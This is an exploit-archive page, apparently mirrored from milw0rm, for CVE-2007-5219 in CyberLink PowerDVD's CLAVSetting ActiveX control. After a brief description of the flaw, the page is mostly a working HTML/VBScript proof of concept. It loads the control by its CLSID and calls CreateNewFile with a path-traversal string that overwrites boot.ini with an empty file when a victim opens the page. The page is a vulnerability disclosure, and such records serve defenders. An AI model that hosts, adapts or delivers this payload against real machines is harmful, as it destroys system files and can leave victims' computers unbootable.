CyberLink PowerDVD - CreateNewFile Remote Rewrite Denial of Service



EKU-ID: 12434 CVE: OSVDB-37725;CVE-2007-5219 OSVDB-ID:
Author: rgod Published: 2007-10-01 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


<!--
CyberLink PowerDVD CLAVSetting Module (CLAVSetting.DLL 1.00.1829) arbitrary remote rewrite dos

this is installed by default on Acer Travelmate series
allows to overwrite files with an empty one
extension doesn't matter

object safety report:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller

rgod
-->
<html>
<object classid='clsid:0990EDE2-3498-43D0-971D-D5321C893210' id='CLSetting' /></object>
<script language='vbscript'>
CLSetting.CreateNewFile "..\..\..\..\..\..\..\..\boot.ini"
</script>
</html>

# milw0rm.com [2007-10-01]